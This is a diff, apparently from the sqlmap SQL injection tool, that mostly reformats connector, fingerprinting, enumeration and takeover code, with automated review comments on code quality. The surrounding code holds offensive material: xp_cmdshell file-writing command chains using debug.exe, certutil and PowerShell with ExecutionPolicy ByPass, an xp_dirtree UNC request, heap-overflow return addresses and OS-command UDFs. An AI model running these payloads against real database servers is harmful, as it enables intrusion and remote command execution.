@ -39,8 +39,8 @@ class Connector(GenericConnector):
self.checkFileDb() self.checkFileDb()
try: try:
self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ # Reference: http://www.daniweb.com/forums/thread248499.html
user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8")
except kinterbasdb.OperationalError, msg: except kinterbasdb.OperationalError, msg:
raise SqlmapConnectionException(msg[1]) raise SqlmapConnectionException(msg[1])
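Review bot: The `# Reference: http://www.daniweb.com/forums/thread248499.html` comment, now placed above the `kinterbasdb.connect(...)` call, no longer says what it is a reference for; presumably the `.encode(UNICODE_ENCODING)` applied to every argument, but that is not visible from the hunk. Stating the why makes the comment useful, e.g. `# kinterbasdb expects byte-string arguments, hence the encode() calls (see http://www.daniweb.com/forums/thread248499.html)`, adjusted if the reason differs. The handler `raise SqlmapConnectionException(msg[1])` also assumes the exception carries at least two args; a comment noting that kinterbasdb guarantees this, if it does, would help.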


@ -68,12 +68,12 @@ class Fingerprint(GenericFingerprint):
def _sysTablesCheck(self): def _sysTablesCheck(self):
retVal = None retVal = None
table = ( table = (
("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5 # TODO: add test for Firebird 2.5
) )
for i in xrange(len(table)): for i in xrange(len(table)):
version, checks = table[i] version, checks = table[i]


@ -46,11 +46,8 @@ class Connector(GenericConnector):
try: try:
driver = 'org.hsqldb.jdbc.JDBCDriver' driver = 'org.hsqldb.jdbc.JDBCDriver'
connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
self.connector = jaydebeapi.connect(driver, self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password))
connection_string,
str(self.user),
str(self.password))
except Exception, msg: except Exception, msg:
raise SqlmapConnectionException(msg[0]) raise SqlmapConnectionException(msg[0])
@ -70,7 +67,7 @@ class Connector(GenericConnector):
try: try:
self.cursor.execute(query) self.cursor.execute(query)
retVal = True retVal = True
except Exception, msg: #todo fix with specific error except Exception, msg: # TODO: fix with specific error
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
self.connector.commit() self.connector.commit()
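Review bot: The reworded `# TODO: fix with specific error` at `except Exception, msg:` still leaves every exception type caught, and the handler then reads `msg[1]`, which raises IndexError for any exception carrying fewer than two args and turns the intended warning into an unrelated traceback. Until the specific jaydebeapi exception is identified, `logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg))`, using the helper this commit already relies on for sqlite3 errors, is safer than indexing. In the first hunk, `connection_string = 'jdbc:hsqldb:mem:.'` keeps the host/db form only as a trailing comment; a why-comment explaining that an in-memory database is opened on purpose would help, since a reader expects `self.hostname`/`self.db` to be used. Both methods start outside the hunk.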


@ -37,7 +37,6 @@ class Connector(GenericConnector):
except ibm_db_dbi.OperationalError, msg: except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg) raise SqlmapConnectionException(msg)
self.initCursor() self.initCursor()
self.printConnected() self.printConnected()


@ -41,4 +41,4 @@ class Syntax(GenericSyntax):
for _ in excluded.items(): for _ in excluded.items():
retVal = retVal.replace(_[1], _[0]) retVal = retVal.replace(_[1], _[0])
return retVal return retVal


@ -108,7 +108,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
elif conf.db is not None: elif conf.db is not None:
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
@ -184,9 +184,7 @@ class Enumeration(GenericEnumeration):
rootQuery = queries[DBMS.MAXDB].columns rootQuery = queries[DBMS.MAXDB].columns
for tbl in tblList: for tbl in tblList:
if conf.db is not None and len(kb.data.cachedColumns) > 0 \ if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]:
and conf.db in kb.data.cachedColumns and tbl in \
kb.data.cachedColumns[conf.db]:
infoMsg = "fetched tables' columns on " infoMsg = "fetched tables' columns on "
infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)
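Review bot: In the joined condition at the top of the hunk, `len(kb.data.cachedColumns) > 0` is redundant: the following `conf.db in kb.data.cachedColumns` test is already false on an empty dict, so the length check adds nothing but noise to a line the commit is rewriting anyway. I would drop it: `if conf.db is not None and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]:`. The enclosing `for tbl in tblList` body continues past the hunk.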


@ -368,16 +368,16 @@ class Enumeration(GenericEnumeration):
if foundTbl not in dbs[db]: if foundTbl not in dbs[db]:
dbs[db][foundTbl] = {} dbs[db][foundTbl] = {}
if colConsider == "1": if colConsider == '1':
conf.db = db conf.db = db
conf.tbl = foundTbl conf.tbl = foundTbl
conf.col = column conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\ if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
else: else:
dbs[db][foundTbl][column] = None dbs[db][foundTbl][column] = None


@ -73,10 +73,13 @@ class Filesystem(GenericFilesystem):
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
"debug < %s" % randScr,
"del /F /Q %s" % randScr
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
return chunkName return chunkName
@ -195,12 +198,13 @@ class Filesystem(GenericFilesystem):
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, commands = (
"del /F /Q \"%s\"" % encodedBase64FilePath, "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % randPSScriptPath) "del /F /Q \"%s\"" % encodedBase64FilePath,
complComm = " & ".join(command for command in commands) "del /F /Q \"%s\"" % randPSScriptPath
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType infoMsg = "using debug.exe to write the %s " % fileType
@ -219,10 +223,13 @@ class Filesystem(GenericFilesystem):
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, dFileName),
"move /Y %s %s" % (dFileName, dFile)
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
else: else:
debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload " debugMsg += "sqlmap will split it into chunks locally, upload "
@ -244,17 +251,22 @@ class Filesystem(GenericFilesystem):
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
copyCmd,
"del /F /Q %s" % chunkName
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
"move /Y %s %s" % (dFileName, dFile)
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the " infoMsg = "using a custom visual basic script to write the "
@ -330,12 +342,14 @@ class Filesystem(GenericFilesystem):
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, commands = (
"del /F /Q %s" % randVbs, "cd \"%s\"" % tmpPath,
"del /F /Q %s" % randFile) "cscript //nologo %s" % randVbs,
complComm = " & ".join(command for command in commands) "del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType infoMsg = "using certutil.exe to write the %s " % fileType
@ -349,7 +363,7 @@ class Filesystem(GenericFilesystem):
encodedFileContent = base64encode(wFileContent) encodedFileContent = base64encode(wFileContent)
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
@ -357,11 +371,13 @@ class Filesystem(GenericFilesystem):
logger.debug("decoding the file to %s.." % dFile) logger.debug("decoding the file to %s.." % dFile)
commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), commands = (
"del /F /Q %s" % randFile) "cd \"%s\"" % tmpPath,
complComm = " & ".join(command for command in commands) "certutil -f -decode %s %s" % (randFile, dFile),
"del /F /Q %s" % randFile
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended # NOTE: this is needed here because we use xp_cmdshell extended
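Review bot: `dFile` is interpolated unquoted into the rebuilt `"move /Y %s %s" % (dFileName, dFile)` tuples in `_stackedWriteFileDebugExe` (both the small-file branch and the chunked branch) and into `"certutil -f -decode %s %s" % (randFile, dFile)` in `_stackedWriteFileCertutilExe`, while the same commit quotes `randPSScriptPath` and `encodedBase64FilePath` as `\"%s\"` and `tmpPath` already gets `cd \"%s\"`. `dFile` is the operator-supplied destination path, so a value containing a space or a `&` would be split by cmd.exe once the tuple is joined with ` & ` and the write would fail or run something else. I would quote it consistently: `"move /Y %s \"%s\"" % (dFileName, dFile)` and `"certutil -f -decode %s \"%s\"" % (randFile, dFile)`. The enclosing methods start before and continue after their hunks, so I cannot see whether `dFile` is sanitised earlier.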


@ -88,12 +88,14 @@ class Fingerprint(GenericFingerprint):
infoMsg = "confirming %s" % DBMS.MSSQL infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg) logger.info(infoMsg)
for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ for version, check in (
("2005", "XACT_STATE()=XACT_STATE()"), \ ("2000", "HOST_NAME()=HOST_NAME()"),
("2008", "SYSDATETIME()=SYSDATETIME()"), \ ("2005", "XACT_STATE()=XACT_STATE()"),
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \ ("2008", "SYSDATETIME()=SYSDATETIME()"),
("2014", "CHARINDEX('12.0.2000',@@version)>0"), \ ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"),
("2016", "ISJSON(NULL) IS NULL")): ("2014", "CHARINDEX('12.0.2000',@@version)>0"),
("2016", "ISJSON(NULL) IS NULL")
):
result = inject.checkBooleanExpression(check) result = inject.checkBooleanExpression(check)
if result: if result:
@ -136,14 +138,16 @@ class Fingerprint(GenericFingerprint):
# Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
# http://en.wikipedia.org/wiki/Windows_NT#Releases # http://en.wikipedia.org/wiki/Windows_NT#Releases
versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)), versions = {
"2000": ("5.0", (4, 3, 2, 1)), "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
"XP": ("5.1", (3, 2, 1)), "2000": ("5.0", (4, 3, 2, 1)),
"2003": ("5.2", (2, 1)), "XP": ("5.1", (3, 2, 1)),
"Vista or 2008": ("6.0", (2, 1)), "2003": ("5.2", (2, 1)),
"7 or 2008 R2": ("6.1", (1, 0)), "Vista or 2008": ("6.0", (2, 1)),
"8 or 2012": ("6.2", (0,)), "7 or 2008 R2": ("6.1", (1, 0)),
"8.1 or 2012 R2": ("6.3", (0,)) } "8 or 2012": ("6.2", (0,)),
"8.1 or 2012 R2": ("6.3", (0,))
}
# Get back-end DBMS underlying operating system version # Get back-end DBMS underlying operating system version
for version, data in versions.items(): for version, data in versions.items():
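Review bot: In the reformatted probe tuple, the `"2014"` entry tests `CHARINDEX('12.0.2000',@@version)>0`, which matches only the RTM build string, whereas every other entry is a feature probe that holds across service packs; a patched 2014 instance whose `@@version` no longer contains `12.0.2000` would presumably fail this check and be reported as `2012` unless the `2016` probe succeeds. Matching the major/minor prefix instead keeps the intent without tying it to one build: `("2014", "CHARINDEX('12.0.',@@version)>0")`. The loop that consumes `result` continues outside the hunk, so how a failed probe is treated is an inference on my part.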


@ -20,7 +20,7 @@ class Takeover(GenericTakeover):
GenericTakeover.__init__(self) GenericTakeover.__init__(self)
def uncPathRequest(self): def uncPathRequest(self):
#inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)
def spHeapOverflow(self): def spHeapOverflow(self):
@ -31,21 +31,22 @@ class Takeover(GenericTakeover):
""" """
returns = { returns = {
# 2003 Service Pack 0 # 2003 Service Pack 0
"2003-0": (""), "2003-0": (""),
# 2003 Service Pack 1 # 2003 Service Pack 1
"2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 12/2008 # 2003 Service Pack 2 updated at 12/2008
#"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 05/2009 # 2003 Service Pack 2 updated at 05/2009
"2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 09/2009
# "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
}
# 2003 Service Pack 2 updated at 09/2009
#"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
}
addrs = None addrs = None
for versionSp, data in returns.items(): for versionSp, data in returns.items():
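Review bot: `"2003-0": ("")` in the reformatted `returns` dict is a plain empty string, not a one-element tuple (there is no trailing comma), so unlike every other entry `data` for that key iterates to nothing and does not index like the tuples; the loop body that consumes `data` continues outside the hunk, so I cannot tell whether that is relied on. Making the entries uniform removes the ambiguity: `"2003-0": ()` (or `("",)` if one empty address is intended). The commented-out `"2003-2"` alternatives are dead code kept inside the literal; a one-line comment saying they are retained as reference for other patch levels would explain why they survive a cleanup commit.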


@ -23,11 +23,11 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take
def __init__(self): def __init__(self):
self.excludeDbsList = MYSQL_SYSTEM_DBS self.excludeDbsList = MYSQL_SYSTEM_DBS
self.sysUdfs = { self.sysUdfs = {
# UDF name: UDF return data-type # UDF name: UDF return data-type
"sys_exec": { "return": "int" }, "sys_exec": {"return": "int"},
"sys_eval": { "return": "string" }, "sys_eval": {"return": "string"},
"sys_bineval": { "return": "int" } "sys_bineval": {"return": "int"}
} }
Syntax.__init__(self) Syntax.__init__(self)
Fingerprint.__init__(self) Fingerprint.__init__(self)


@ -41,18 +41,19 @@ class Fingerprint(GenericFingerprint):
# Reference: https://downloads.mysql.com/archives/community/ # Reference: https://downloads.mysql.com/archives/community/
versions = ( versions = (
(32200, 32235), # MySQL 3.22 (32200, 32235), # MySQL 3.22
(32300, 32359), # MySQL 3.23 (32300, 32359), # MySQL 3.23
(40000, 40032), # MySQL 4.0 (40000, 40032), # MySQL 4.0
(40100, 40131), # MySQL 4.1 (40100, 40131), # MySQL 4.1
(50000, 50096), # MySQL 5.0 (50000, 50096), # MySQL 5.0
(50100, 50172), # MySQL 5.1 (50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4 (50400, 50404), # MySQL 5.4
(50500, 50554), # MySQL 5.5 (50500, 50558), # MySQL 5.5
(50600, 50635), # MySQL 5.6 (50600, 50638), # MySQL 5.6
(50700, 50717), # MySQL 5.7 (50700, 50720), # MySQL 5.7
(60000, 60014), # MySQL 6.0 (60000, 60014), # MySQL 6.0
) (80000, 80003), # MySQL 8.0
)
index = -1 index = -1
for i in xrange(len(versions)): for i in xrange(len(versions)):
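Review bot: The new `(80000, 80003)  # MySQL 8.0` entry bounds the range at 8.0.3, i.e. the development releases available at the commit date, so any later 8.0 server falls outside every range and leaves `index = -1`; what that fallback does is decided below the hunk. Since the upper bounds are maintained by hand, I would say so next to the reference link, e.g. `# NOTE: upper bounds are the latest releases known at the time of writing and must be bumped as new versions ship`. The `for i in xrange(len(versions))` index loop could also be `for i, (low, high) in enumerate(versions)` for readability, but that is style only.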


@ -67,10 +67,10 @@ class Takeover(GenericTakeover):
# On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
# On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
else: else:
#logger.debug("retrieving MySQL data directory absolute path") # logger.debug("retrieving MySQL data directory absolute path")
# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir
#self.__datadir = inject.getValue("SELECT @@datadir") # self.__datadir = inject.getValue("SELECT @@datadir")
# NOTE: specifying the relative path as './udf.dll' # NOTE: specifying the relative path as './udf.dll'
# saves in @@datadir on both MySQL 4.1 and MySQL 5.0 # saves in @@datadir on both MySQL 4.1 and MySQL 5.0


@ -23,12 +23,12 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous,
def __init__(self): def __init__(self):
self.excludeDbsList = PGSQL_SYSTEM_DBS self.excludeDbsList = PGSQL_SYSTEM_DBS
self.sysUdfs = { self.sysUdfs = {
# UDF name: UDF parameters' input data-type and return data-type # UDF name: UDF parameters' input data-type and return data-type
"sys_exec": { "input": ["text"], "return": "int4" }, "sys_exec": {"input": ["text"], "return": "int4"},
"sys_eval": { "input": ["text"], "return": "text" }, "sys_eval": {"input": ["text"], "return": "text"},
"sys_bineval": { "input": ["text"], "return": "int4" }, "sys_bineval": {"input": ["text"], "return": "int4"},
"sys_fileread": { "input": ["text"], "return": "text" } "sys_fileread": {"input": ["text"], "return": "text"}
} }
Syntax.__init__(self) Syntax.__init__(self)
Fingerprint.__init__(self) Fingerprint.__init__(self)


@ -22,6 +22,6 @@ class Syntax(GenericSyntax):
""" """
def escaper(value): def escaper(value):
return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s)
return Syntax._escape(expression, quote, escaper) return Syntax._escape(expression, quote, escaper)


@ -176,7 +176,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
elif conf.db is not None: elif conf.db is not None:
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)


@ -400,7 +400,7 @@ class Databases:
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
conf.db = conf.db.upper() conf.db = conf.db.upper()
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
@ -663,8 +663,7 @@ class Databases:
query += condQuery query += condQuery
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.count % (conf.db, conf.db, \ query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
query += condQuery.replace("[DB]", conf.db) query += condQuery.replace("[DB]", conf.db)
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
